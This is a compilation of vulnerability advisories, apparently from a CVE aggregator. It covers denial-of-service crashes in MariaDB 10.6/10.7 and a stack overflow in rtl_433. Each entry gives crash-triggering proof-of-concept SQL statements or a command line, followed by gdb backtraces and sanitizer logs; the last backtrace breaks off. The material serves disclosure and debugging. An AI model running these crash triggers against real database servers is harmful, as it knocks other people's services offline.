An issue in the component Field::set_default of MariaDB Server v10.6 and below was discovered to allow attackers to cause a Denial of Service (DoS) via specially crafted SQL statements.

CREATE TEMPORARY TABLE v0 ( v2 TIMESTAMP CHECK ( DEFAULT ( v2 ) IS NOT TRUE ) , v1 TIMESTAMP ) AS SELECT DISTINCT 'x' AS v3 WINDOW CHECKSUM AS ( ) ;

Core was generated by \`/home/supersix/fuzz/security/MariaDB/install/bin/mysqld --defaults-file=/home/s'.

Program terminated with signal SIGSEGV, Segmentation fault.

#0  \_\_pthread\_kill (threadid=<optimized out>, signo=signo@entry=0xb)

    at ../sysdeps/unix/sysv/linux/pthread\_kill.c:56

\[Current thread is 1 (Thread 0x7f154c17f300 (LWP 1992265))\]

gdb-peda$ #0  \_\_pthread\_kill (threadid=<optimized out>, signo=signo@entry=0xb)

    at ../sysdeps/unix/sysv/linux/pthread\_kill.c:56

#1  0x00005640d742e98f in my\_write\_core (sig=sig@entry=0xb)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/mysys/stacktrace.c:424

#2  0x00005640d5e9b583 in handle\_fatal\_signal (sig=<optimized out>)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/signal\_handler.cc:344

#3  <signal handler called>

#4  0x00005640d5dfe617 in Field::set\_default (this=0x61d0000b9ab8)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/field.cc:2591

#5  0x00005640d5f553a6 in Item\_default\_value::calculate (this=0x6190000f5240)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/item.cc:9468

#6  0x00005640d5f55466 in Item\_default\_value::val\_real (this=0x6190000f5240)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/item.cc:9486

#7  0x00005640d5bbf3bb in Type\_handler\_real\_result::Item\_val\_bool (

    this=<optimized out>, item=<optimized out>)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_type.cc:5080

#8  0x00005640d5fa186c in Item\_func\_truth::val\_bool (this=0x6190000f5370)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/item\_cmpfunc.cc:1165

#9  Item\_func\_truth::val\_int (this=0x6190000f5370)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/item\_cmpfunc.cc:1188

#10 0x00005640d5966058 in TABLE::verify\_constraints (this=0x6190000f4698,

    ignore\_failure=<optimized out>)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/table.cc:6155

#11 0x00005640d5966bbd in TABLE\_LIST::view\_check\_option (this=0x62b000085498,

    thd=<optimized out>, ignore\_failure=<optimized out>)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/table.cc:6128

#12 0x00005640d5476284 in select\_insert::send\_data (this=0x62b0000871f0,

    values=...)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_insert.cc:4061

#13 0x00005640d576aafa in select\_result\_sink::send\_data\_with\_check (

    u=0x62b0000823d0, sent=0x0, items=..., this=0x62b0000871f0)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_class.h:5609

#14 select\_result\_sink::send\_data\_with\_check (sent=0x0, u=0x62b0000823d0,

    items=..., this=0x62b0000871f0)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_class.h:5599

#15 JOIN::exec\_inner (this=0x62b000087340)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_select.cc:4592

#16 0x00005640d576bd20 in JOIN::exec (this=0x62b000087340)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_select.cc:4504

#17 0x00005640d5762338 in mysql\_select (thd=0x62b00007e218,

    tables=<optimized out>, fields=..., conds=<optimized out>, og\_num=0x0,

    order=<optimized out>, group=0x0, having=0x0, proc\_param=0x0,

    select\_options=0x20080040b01, result=0x62b0000871f0, unit=0x62b0000823d0,

    select\_lex=0x62b000086138)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_select.cc:4982

#18 0x00005640d5764425 in handle\_select (thd=thd@entry=0x62b00007e218,

    lex=lex@entry=0x62b000082308, result=result@entry=0x62b0000871f0,

    setup\_tables\_done\_option=setup\_tables\_done\_option@entry=0x0)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_select.cc:544

#19 0x00005640d588eb96 in Sql\_cmd\_create\_table\_like::execute (

    this=<optimized out>, thd=0x62b00007e218)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_table.cc:11746

#20 0x00005640d5591a67 in mysql\_execute\_command (thd=<optimized out>,

    is\_called\_from\_prepared\_stmt=<optimized out>)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_parse.cc:5995

#21 0x00005640d55508dd in mysql\_parse (thd=0x62b00007e218,

    rawbuf=<optimized out>, length=<optimized out>,

    parser\_state=<optimized out>)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_parse.cc:8028

#22 0x00005640d55862a4 in dispatch\_command (command=COM\_QUERY,

    thd=0x62b00007e218, packet=<optimized out>, packet\_length=<optimized out>,

    blocking=<optimized out>)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_class.h:233

#23 0x00005640d558b704 in do\_command (thd=0x62b00007e218,

    blocking=blocking@entry=0x1)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_parse.cc:1406

#24 0x00005640d5a4b14d in do\_handle\_one\_connection (connect=<optimized out>,

    put\_in\_cache=<optimized out>)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_connect.cc:1410

#25 0x00005640d5a4c807 in handle\_one\_connection (arg=arg@entry=0x608005322038)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_connect.cc:1312

#26 0x00005640d6897ef0 in pfs\_spawn\_thread (arg=0x617000005118)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/storage/perfschema/pfs.cc:2201

#27 0x00007f155f9fb609 in start\_thread (arg=<optimized out>)

    at pthread\_create.c:477

#28 0x00007f155f5cf293 in clone ()

    at ../sysdeps/unix/sysv/linux/x86\_64/clone.S:95

gdb-peda$ quit

CVE-2022-27381: [MDEV-26061] MariaDB server crash at Field::set_default

An issue in the component Arg_comparator::compare_real_fixed of MariaDB Server v10.6.2 and below was discovered to allow attackers to cause a Denial of Service (DoS) via specially crafted SQL statements.

CREATE TEMPORARY TABLE v0 ( v4 SMALLINT , v3 TINYINT , v2 NCHAR BINARY GENERATED ALWAYS AS ( NULL NOT IN ( 'x' SOUNDS LIKE UTC\_TIME ( ) IS NULL IS NULL IS FALSE ) IS NOT FALSE ) , v1 INT ) ;

 SELECT CONVERT ( CHAR ( 'x' IS FALSE ) \* DEFAULT ( v2 ) \* 'x' \* 62721821.000000 , DATETIME ) REGEXP v1 'x' FROM v0 ;

 INSERT IGNORE INTO v0 VALUES ( 78470821.000000 , 'x' , -32768 , v1 IN ( 'x' , FALSE NOT REGEXP v3 IS FALSE ) ) ;

Core was generated by \`/home/supersix/fuzz/security/MariaDB/install\_debug/bin/mysqld --defaults-file=/'.

Program terminated with signal SIGABRT, Aborted.

#0  \_\_pthread\_kill (threadid=<optimized out>, signo=signo@entry=0x6)

    at ../sysdeps/unix/sysv/linux/pthread\_kill.c:56

56	../sysdeps/unix/sysv/linux/pthread\_kill.c: No such file or directory.

\[Current thread is 1 (Thread 0x7f8010296700 (LWP 1431325))\]

gdb-peda$ bt

#0  \_\_pthread\_kill (threadid=<optimized out>, signo=signo@entry=0x6)

    at ../sysdeps/unix/sysv/linux/pthread\_kill.c:56

#1  0x000055ceeec1e94f in my\_write\_core (sig=sig@entry=0x6)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/mysys/stacktrace.c:424

#2  0x000055ceee729d60 in handle\_fatal\_signal (sig=0x6)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/signal\_handler.cc:344

#3  <signal handler called>

#4  \_\_GI\_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:50

#5  0x00007f8010d68859 in \_\_GI\_abort () at abort.c:79

#6  0x00007f801113f951 in ?? () from /lib/x86\_64-linux-gnu/libstdc++.so.6

#7  0x00007f801114b47c in ?? () from /lib/x86\_64-linux-gnu/libstdc++.so.6

#8  0x00007f801114b4e7 in std::terminate() () from /lib/x86\_64-linux-gnu/libstdc++.so.6

#9  0x00007f801114c245 in \_\_cxa\_pure\_virtual () from /lib/x86\_64-linux-gnu/libstdc++.so.6

#10 0x000055ceee75d6ef in Arg\_comparator::compare\_real\_fixed (this=0x7f7f88115bf0)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/item\_cmpfunc.cc:897

#11 0x000055ceee76b464 in Arg\_comparator::compare (this=0x7f7f88115bf0)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/item\_cmpfunc.h:103

#12 Item\_func\_ne::val\_int (this=0x7f7f88115b40)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/item\_cmpfunc.cc:1788

#13 0x000055ceee67b604 in Type\_handler\_int\_result::Item\_val\_bool (this=<optimized out>,

    item=<optimized out>) at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_type.cc:5085

#14 0x000055ceee75de10 in Item\_func\_truth::val\_bool (this=0x7f7f88115dc0)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/item\_cmpfunc.cc:1165

#15 0x000055ceee75de81 in Item\_func\_truth::val\_int (this=<optimized out>)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/item\_cmpfunc.cc:1188

#16 0x000055ceee74f443 in Item::save\_int\_in\_field (this=0x7f7f88115dc0, field=0x7f7f8801ac90,

    no\_conversions=<optimized out>)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/item.cc:6700

#17 0x000055ceee7412a7 in Item::save\_in\_field (this=0x7f7f88115dc0, field=0x7f7f8801ac90,

    no\_conversions=<optimized out>)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/item.cc:6710

#18 0x000055ceee5f87a0 in TABLE::update\_virtual\_fields (this=this@entry=0x7f7f8801a698,

    h=<optimized out>, update\_mode=update\_mode@entry=VCOL\_UPDATE\_FOR\_WRITE)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/table.cc:8718

#19 0x000055ceee4ba3a5 in fill\_record (thd=thd@entry=0x7f7f88000c58,

    table=table@entry=0x7f7f8801a698, ptr=0x7f7f8801aaf0, ptr@entry=0x7f7f8801aac8, values=...,

    ignore\_errors=ignore\_errors@entry=0x0, use\_value=use\_value@entry=0x0)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_base.cc:8845

#20 0x000055ceee4ba444 in fill\_record\_n\_invoke\_before\_triggers (thd=thd@entry=0x7f7f88000c58,

    table=table@entry=0x7f7f8801a698, ptr=0x7f7f8801aac8, values=...,

    ignore\_errors=ignore\_errors@entry=0x0, event=event@entry=TRG\_EVENT\_INSERT)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_base.cc:8888

#21 0x000055ceee4e6af6 in mysql\_insert (thd=thd@entry=0x7f7f88000c58, table\_list=<optimized out>,

    fields=..., values\_list=..., update\_fields=..., update\_values=..., duplic=<optimized out>,

    ignore=<optimized out>, result=<optimized out>)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_insert.cc:1047

#22 0x000055ceee5204e7 in mysql\_execute\_command (thd=0x7f7f88000c58,

    is\_called\_from\_prepared\_stmt=<optimized out>)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_parse.cc:4568

#23 0x000055ceee510287 in mysql\_parse (thd=0x7f7f88000c58, rawbuf=<optimized out>,

    length=<optimized out>, parser\_state=<optimized out>)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_parse.cc:8028

#24 0x000055ceee51c285 in dispatch\_command (command=COM\_QUERY, thd=0x7f7f88000c58,

    packet=<optimized out>, packet\_length=<optimized out>, blocking=<optimized out>)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_class.h:1340

#25 0x000055ceee51e1a8 in do\_command (thd=0x7f7f88000c58, blocking=blocking@entry=0x1)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_parse.cc:1406

#26 0x000055ceee624317 in do\_handle\_one\_connection (connect=<optimized out>, put\_in\_cache=0x1)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_connect.cc:1410

#27 0x000055ceee62467d in handle\_one\_connection (arg=arg@entry=0x55cef0328838)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_connect.cc:1312

#28 0x000055ceee96097d in pfs\_spawn\_thread (arg=0x55cef06008d8)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/storage/perfschema/pfs.cc:2201

#29 0x00007f8011291609 in start\_thread (arg=<optimized out>) at pthread\_create.c:477

#30 0x00007f8010e65293 in clone () at ../sysdeps/unix/sysv/linux/x86\_64/clone.S:95

CVE-2022-27379: [MDEV-26353] MariaDB server crash in Arg_comparator::compare_real_fixed

An issue in the component Used_tables_and_const_cache::used_tables_and_const_cache_join of MariaDB Server v10.7 and below was discovered to allow attackers to cause a Denial of Service (DoS) via specially crafted SQL statements.

PoC:

CREATE TABLE v0 AS SELECT NULL AS v1 FROM DUAL ;

 SELECT \* FROM v0 WHERE unhex ( log2 ( nullif ( NULL , 'x' ) ) ) = 'x' OR 'x' ;

 UPDATE v0 SET v1 = v1 + 86 , v1 = v1 + 2147483647 WHERE ( v1 , v1 ) IN ( ( -128 , -1 ) ) ;

 UPDATE v0 SET v1 = ( SELECT v1 + 16 FROM v0 HAVING v1 + 57 ) ;

Crash Log:

This could be because you hit a bug. It is also possible that this binary  
or one of the libraries it was linked against is corrupt, improperly built,  
or misconfigured. This error can also be caused by malfunctioning hardware.

To report this bug, see https://mariadb.com/kb/en/reporting-bugs

We will try our best to scrape up some info that will hopefully help  
diagnose the problem, but since we have already crashed,  
something is definitely wrong and this may fail.

Server version: 10.7.0-MariaDB  
key\_buffer\_size=134217728  
read\_buffer\_size=131072  
max\_used\_connections=1  
max\_threads=153  
thread\_count=1  
It is possible that mysqld could use up to  
key\_buffer\_size + (read\_buffer\_size + sort\_buffer\_size)\*max\_threads = 467956 K bytes of memory  
Hope that's ok; if not, decrease some variables in the equation.

Thread pointer: 0x62b0000bd218  
Attempting backtrace. You can use the following information to find out  
where mysqld died. If you see no messages after this, something went  
terribly wrong...  
stack\_bottom = 0x7f856fd77850 thread\_stack 0x5fc00  
sanitizer\_common/sanitizer\_common\_interceptors.inc:4203(\_\_interceptor\_backtrace.part.0)\[0x7f858f623c3e\]  
mysys/stacktrace.c:213(my\_print\_stacktrace)\[0x55905678c747\]  
sql/signal\_handler.cc:222(handle\_fatal\_signal)\[0x559055754120\]  
sigaction.c:0(\_\_restore\_rt)\[0x7f858f00d870\]  
sql/item.h:5311(Used\_tables\_and\_const\_cache::used\_tables\_and\_const\_cache\_join(Item const\*))\[0x5590557ff227\]  
sql/item.cc:7918(Item\_ref::fix\_fields(THD\*, Item\*\*))\[0x5590557e66b6\]  
sql/item\_func.cc:347(Item\_func::fix\_fields(THD\*, Item\*\*))\[0x5590558e829c\]  
sql/item.h:1148(Item::fix\_fields\_if\_needed\_for\_scalar(THD\*, Item\*\*))\[0x55905514066d\]  
sql/item\_subselect.cc:3903(subselect\_single\_select\_engine::prepare(THD\*))\[0x559055a484f6\]  
sql/item\_subselect.cc:295(Item\_subselect::fix\_fields(THD\*, Item\*\*))\[0x559055a45d05\]  
sql/item.h:1148(Item::fix\_fields\_if\_needed\_for\_scalar(THD\*, Item\*\*))\[0x559054e832ed\]  
sql/sql\_update.cc:2077(multi\_update::prepare(List<Item>&, st\_select\_lex\_unit\*))\[0x5590552d58ed\]  
sql/sql\_select.cc:1684(JOIN::prepare(TABLE\_LIST\*, Item\*, unsigned int, st\_order\*, bool, st\_order\*, Item\*, st\_order\*, st\_select\_lex\*, st\_select\_lex\_unit\*))\[0x559055142817\]  
sql/sql\_select.cc:4967(mysql\_select(THD\*, TABLE\_LIST\*, List<Item>&, Item\*, unsigned int, st\_order\*, st\_order\*, Item\*, st\_order\*, unsigned long long, select\_result\*, st\_select\_lex\_unit\*, st\_select\_lex\*))\[0x559055186caa\]  
sql/sql\_class.h:4325(THD::is\_error() const)\[0x5590552e4d8c\]  
sql/sql\_parse.cc:4499(mysql\_execute\_command(THD\*, bool))\[0x559054ff4320\]  
sql/sql\_parse.cc:8047(mysql\_parse(THD\*, char\*, unsigned int, Parser\_state\*))\[0x559054ff95a1\]  
sql/sql\_parse.cc:1898(dispatch\_command(enum\_server\_command, THD\*, char\*, unsigned int, bool))\[0x559054fff60c\]  
sql/sql\_parse.cc:1406(do\_command(THD\*, bool))\[0x55905500473d\]  
sql/sql\_connect.cc:1418(do\_handle\_one\_connection(CONNECT\*, bool))\[0x5590553bfe57\]  
sql/sql\_connect.cc:1312(handle\_one\_connection)\[0x5590553c033d\]  
perfschema/pfs.cc:2204(pfs\_spawn\_thread)\[0x559055e50c2c\]  
pthread\_create.c:0(start\_thread)\[0x7f858f003259\]  
:0(\__GI_\_\_clone)\[0x7f858ebae5e3\]

Trying to get some variables.  
Some pointers may be invalid and cause the dump to abort.  
Query (0x629000087238): UPDATE v0 SET v1 = ( SELECT v1 + 16 FROM v0 HAVING v1 + 57 )

Connection ID (thread ID): 4  
Status: NOT\_KILLED

CVE-2022-27385: [MDEV-26415] MariaDB server crash in Used_tables_and_const_cache::used_tables_and_const_cache_join

rtl_433 21.12 was discovered to contain a stack overflow in the function acurite_00275rm_decode at /devices/acurite.c. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted file.

    ./rtl_433  -d0 -H5 -H20 -f 433.70M -f 433.80M -f 433.90M POC1
    

    SUMMARY: AddressSanitizer: stack-buffer-overflow /home/zxq/CVE_testing/ASAN-install/rtl_433/src/devices/acurite.c:1244 in acurite_00275rm_decode
    Shadow bytes around the buggy address:
      0x100003f00c10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x100003f00c20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x100003f00c30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x100003f00c40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x100003f00c50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x100003f00c60: 00 00 00 00 00 00 00 00 00 00 00[04]f3 f3 f3 f3
      0x100003f00c70: f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3
      0x100003f00c80: f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 00 00 00 00
      0x100003f00c90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x100003f00ca0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x100003f00cb0: 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00 f2
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==3559329==ABORTING

CVE-2022-27419: Stack-based Buffer Overflow in rtl_433 · Issue #2012 · merbanan/rtl_433

An issue in the component Create_tmp_table::finalize of MariaDB Server v10.7 and below was discovered to allow attackers to cause a Denial of Service (DoS) via specially crafted SQL statements.

PoC:

CREATE TABLE v0 ( v2 DATE DEFAULT ( v1 MOD 68321183.000000 ) , v1 DATETIME NULL ) ;

 SHOW DATABASES LIKE 'x' ;

 SELECT DISTINCT v2 , v1 , DEFAULT ( v2 ) FROM v0 ;

Crash Log:

We will try our best to scrape up some info that will hopefully help  
diagnose the problem, but since we have already crashed,  
something is definitely wrong and this may fail.

Server version: 10.7.0-MariaDB

key\_buffer\_size=134217728

read\_buffer\_size=131072

max\_used\_connections=1

max\_threads=153

thread\_count=1

It is possible that mysqld could use up to 

key\_buffer\_size + (read\_buffer\_size + sort\_buffer\_size)\*max\_threads = 467956 K  bytes of memory

Hope that's ok; if not, decrease some variables in the equation.

Thread pointer: 0x62b0000bd218

Attempting backtrace. You can use the following information to find out

where mysqld died. If you see no messages after this, something went

terribly wrong...

stack\_bottom = 0x7fbccf9b6850 thread\_stack 0x5fc00

sanitizer\_common/sanitizer\_common\_interceptors.inc:4203(\_\_interceptor\_backtrace.part.0)\[0x7fbcf53e9c3e\]

mysys/stacktrace.c:213(my\_print\_stacktrace)\[0x55da8b1e8747\]

sql/signal\_handler.cc:222(handle\_fatal\_signal)\[0x55da8a1b0120\]

sigaction.c:0(\_\_restore\_rt)\[0x7fbcf4dd3870\]

sql/sql\_select.cc:19307(Create\_tmp\_table::finalize(THD\*, TABLE\*, TMP\_TABLE\_PARAM\*, bool, bool))\[0x55da89b716a6\]

sql/sql\_select.cc:19606(create\_tmp\_table(THD\*, TMP\_TABLE\_PARAM\*, List<Item>&, st\_order\*, bool, bool, unsigned long long, unsigned long long, st\_mysql\_const\_lex\_string const\*, bool, bool))\[0x55da89b736a4\]

sql/sql\_select.cc:4015(JOIN::create\_postjoin\_aggr\_table(st\_join\_table\*, List<Item>\*, st\_order\*, bool, bool, bool))\[0x55da89ba26b3\]

sql/sql\_select.cc:3589(JOIN::make\_aggr\_tables\_info())\[0x55da89ba5424\]

sql/sql\_select.cc:3225(JOIN::optimize\_stage2())\[0x55da89bd5e72\]

sql/sql\_select.cc:2479(JOIN::optimize\_inner())\[0x55da89bdfd07\]

sql/sql\_select.cc:1811(JOIN::optimize())\[0x55da89be17b1\]

sql/sql\_select.cc:4977(mysql\_select(THD\*, TABLE\_LIST\*, List<Item>&, Item\*, unsigned int, st\_order\*, st\_order\*, Item\*, st\_order\*, unsigned long long, select\_result\*, st\_select\_lex\_unit\*, st\_select\_lex\*))\[0x55da89be1a0e\]

sql/sql\_select.cc:545(handle\_select(THD\*, LEX\*, select\_result\*, unsigned long))\[0x55da89be3655\]

sql/sql\_parse.cc:6256(execute\_sqlcom\_select(THD\*, TABLE\_LIST\*))\[0x55da89a26d7d\]

sql/sql\_parse.cc:3946(mysql\_execute\_command(THD\*, bool))\[0x55da89a50421\]

sql/sql\_parse.cc:8047(mysql\_parse(THD\*, char\*, unsigned int, Parser\_state\*))\[0x55da89a555a1\]

sql/sql\_parse.cc:1898(dispatch\_command(enum\_server\_command, THD\*, char\*, unsigned int, bool))\[0x55da89a5b60c\]

sql/sql\_parse.cc:1406(do\_command(THD\*, bool))\[0x55da89a6073d\]

sql/sql\_connect.cc:1418(do\_handle\_one\_connection(CONNECT\*, bool))\[0x55da89e1be57\]

sql/sql\_connect.cc:1312(handle\_one\_connection)\[0x55da89e1c33d\]

perfschema/pfs.cc:2204(pfs\_spawn\_thread)\[0x55da8a8acc2c\]

pthread\_create.c:0(start\_thread)\[0x7fbcf4dc9259\]

:0(\_\_GI\_\_\_clone)\[0x7fbcf49745e3\]

Trying to get some variables.

Some pointers may be invalid and cause the dump to abort.

Query (0x629000087238): SELECT DISTINCT v2 , v1 , DEFAULT ( v2 ) FROM v0

Connection ID (thread ID): 4

Status: NOT\_KILLED

CVE-2022-27378: [MDEV-26423] MariaDB server crash in Create_tmp_table::finalize

An issue in the component Item_subselect::init_expr_cache_tracker of MariaDB Server v10.6 and below was discovered to allow attackers to cause a Denial of Service (DoS) via specially crafted SQL statements.

Steps to reproduce:

CREATE TABLE v0 ( v1 INT PRIMARY KEY ) ;

 INSERT INTO v0 VALUES ( ( ( 23695630.000000 ) ) NOT IN ( SELECT DISTINCT - ( 89 IN ( 127 , 'x' , NULL ) ) IN ( 'x' , 127 ) FROM v0 AS v2 WHERE v1 IS NOT NULL GROUP BY ( ( SELECT DISTINCT - ( 'x' IN ( 65 , NULL ) ) IN ( 'x' , -2147483648 ) AND ( SELECT NULL WHERE - ( 16 ) AND ( v1 IN ( ( ( v1 = v1 ) ) = 'x' ) ) = -2147483648 ) ) ) ORDER BY ( v1 = 'x' AND 84 ) OR ( v1 = 8 AND v1 = -1 ) ASC ) ) ;

 CREATE TABLE v3 ( v4 INTEGER , v5 INT PRIMARY KEY , v6 VARCHAR ( 24 ) , v7 INT , v8 INT , v9 INT ) ;

 INSERT INTO v3 ( v5 ) VALUES ( ( ( - ( ( 'x' IS NOT NULL ) ) ) ) ) , ( 55 BETWEEN - 80445159.000000 AND - ( ( ( SELECT DISTINCT v1 IN ( ( -1 IN ( ( SELECT DISTINCT - ( 58 IN ( ( -128 IN ( 54560735.000000 ) ) ) ) NOT IN ( 'x' , - ( ( 54 IN ( ( NULL IN ( ( SELECT v1 FROM v0 AS v12 WHERE - ( 99 ) AND v1 = 95 GROUP BY 89382485.000000 ) ) ) ) ) ) ) AS v11 ) ) ) = 'x' ) FROM v0 AS v10 WHERE v1 IS NOT NULL GROUP BY 'x' , 5612101.000000 ) ) ) ) ;

Backtrace:  
Core was generated by \`/home/supersix/fuzz/security/MariaDB/install/bin/mysqld --defaults-file=/home/s'.

Program terminated with signal SIGSEGV, Segmentation fault.

#0  \_\_pthread\_kill (threadid=<optimized out>, signo=signo@entry=0xb)

    at ../sysdeps/unix/sysv/linux/pthread\_kill.c:56

\[Current thread is 1 (Thread 0x7f0f26251300 (LWP 1437547))\]

gdb-peda$ #0  \_\_pthread\_kill (threadid=<optimized out>, signo=signo@entry=0xb)

    at ../sysdeps/unix/sysv/linux/pthread\_kill.c:56

#1  0x0000559d3cff698f in my\_write\_core (sig=sig@entry=0xb)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/mysys/stacktrace.c:424

#2  0x0000559d3ba63583 in handle\_fatal\_signal (sig=<optimized out>)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/signal\_handler.cc:344

#3  <signal handler called>

#4  0x0000559d3be106ea in Item\_subselect::init\_expr\_cache\_tracker (

    this=0x6290021eddb8, thd=<optimized out>)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_lex.h:982

#5  0x0000559d3be108df in Item\_singlerow\_subselect::expr\_cache\_insert\_transformer (this=0x6290021eddb8, tmp\_thd=0x62b000070218, unused=<optimized out>)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/item\_subselect.cc:1389

#6  0x0000559d3bab3024 in Item::transform (this=<optimized out>,

    thd=<optimized out>, transformer=<optimized out>, arg=<optimized out>)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/item.cc:610

#7  0x0000559d3bb7d48a in Item\_cond::transform (this=<optimized out>,

    thd=<optimized out>, transformer=&virtual table offset 1328,

    arg=<optimized out>)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/item\_cmpfunc.cc:5135

#8  0x0000559d3b235270 in JOIN::setup\_subquery\_caches (this=0x62900222e478)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_select.cc:4225

#9  0x0000559d3b31b21f in JOIN::optimize\_stage2 (this=0x62900222e478)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_select.cc:3065

#10 0x0000559d3b327252 in JOIN::optimize\_inner (this=0x62900222e478)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_select.cc:2477

#11 0x0000559d3b329eda in JOIN::optimize (this=this@entry=0x62900222e478)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_select.cc:1807

#12 0x0000559d3b09fb28 in st\_select\_lex::optimize\_unflattened\_subqueries (

    this=0x62b000079968, const\_only=const\_only@entry=0x0)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_lex.cc:4936

#13 0x0000559d3b0643e5 in mysql\_insert (thd=thd@entry=0x62b000070218,

    table\_list=<optimized out>, fields=..., values\_list=...,

    update\_fields=..., update\_values=..., duplic=<optimized out>,

    ignore=<optimized out>, result=<optimized out>)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_lex.h:982

#14 0x0000559d3b15ca9c in mysql\_execute\_command (thd=<optimized out>,

    is\_called\_from\_prepared\_stmt=<optimized out>)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_parse.cc:4568

#15 0x0000559d3b1188dd in mysql\_parse (thd=0x62b000070218,

    rawbuf=<optimized out>, length=<optimized out>,

    parser\_state=<optimized out>)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_parse.cc:8028

#16 0x0000559d3b14edb9 in dispatch\_command (command=COM\_QUERY,

    thd=0x62b000070218, packet=<optimized out>, packet\_length=<optimized out>,

    blocking=<optimized out>)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_parse.cc:1995

#17 0x0000559d3b153704 in do\_command (thd=0x62b000070218,

    blocking=blocking@entry=0x1)

